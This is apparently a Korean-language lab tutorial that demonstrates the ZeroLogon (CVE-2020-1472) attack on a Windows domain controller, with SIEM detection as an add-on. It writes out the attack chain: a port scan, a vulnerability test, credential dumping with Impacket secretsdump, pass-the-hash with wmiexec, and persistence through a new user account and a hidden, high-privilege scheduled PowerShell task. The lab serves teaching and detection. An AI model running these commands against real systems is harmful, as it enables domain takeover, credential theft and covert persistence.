
ZeroLogon 취약점 (CVE-2020-1472) 설명 및 시연
ZeroLogon 취약점(CVE-2020-1472)에 대한 설명 및 시연
이 연구실의 목적은 순전히 교육용입니다. 프로덕션 환경이나 귀하의 소유가 아닌 환경에서 실행하는 것은 권장되지 않습니다.
취약점 개요
이 취약점을 통해 사이버 범죄자는 도메인 컨트롤러(DC)를 장악할 수 있습니다. 이는 컨트롤러의 서비스 계정 비밀번호를 변경하거나 제거함으로써 이루어집니다. 악의적인 공격자는 단순히 서비스 거부를 유발하거나 제어권을 장악하여 전체 네트워크를 소유할 수 있습니다. 2020년 8월, Microsoft는 패치를 출시했습니다.
영향을 받는 구성 요소: Microsoft Netlogon 원격 프로토콜 (MS-NRPC)
영향을 받는 Windows 버전:
저장소 클론
로컬에서 실행하려면!
AWS에서도 다음 이미지로 가능합니다 (청구 주의).
추가: SIEM 이벤트 분석을 위한 Wazuh 계정.
팁: Kali Linux에서 SSH 서비스는 기본적으로 비활성화되어 있습니다. 수동으로 시작해야 합니다.
서버가 취약한지 테스트하기 전에 nmap을 사용하여 열려 있는 포트를 확인할 수 있습니다:
nmap -sS -T4 -F --open -n ip
CVE-2020-1472 - 대상 서버가 취약한지 테스트를 사용하여 다음 명령을 실행하세요:
zerologon_tester.py <dc-name> <dc-ip>
secretdump 도구는 Impacket의 툴킷입니다.
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
모든 것이 잘 진행된다면, 해시를 사용하여 로그인할 수 있습니다. 패스더해시(Pass-the-Hash) 공격이란?
이제 지속성을 확보하기만 하면 됩니다! 새 사용자를 만들 수 있습니다!
net user coringa Batman2025 /add
완료! 사용자가 성공적으로 생성되었습니다!
작업을 생성하는 것도 가능합니다!
mkdir C:\Temp
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
사용자 생성 및 패스더해시(pass-the-hash) 관련 이벤트 및 사용자 생성을 확인할 수 있습니다!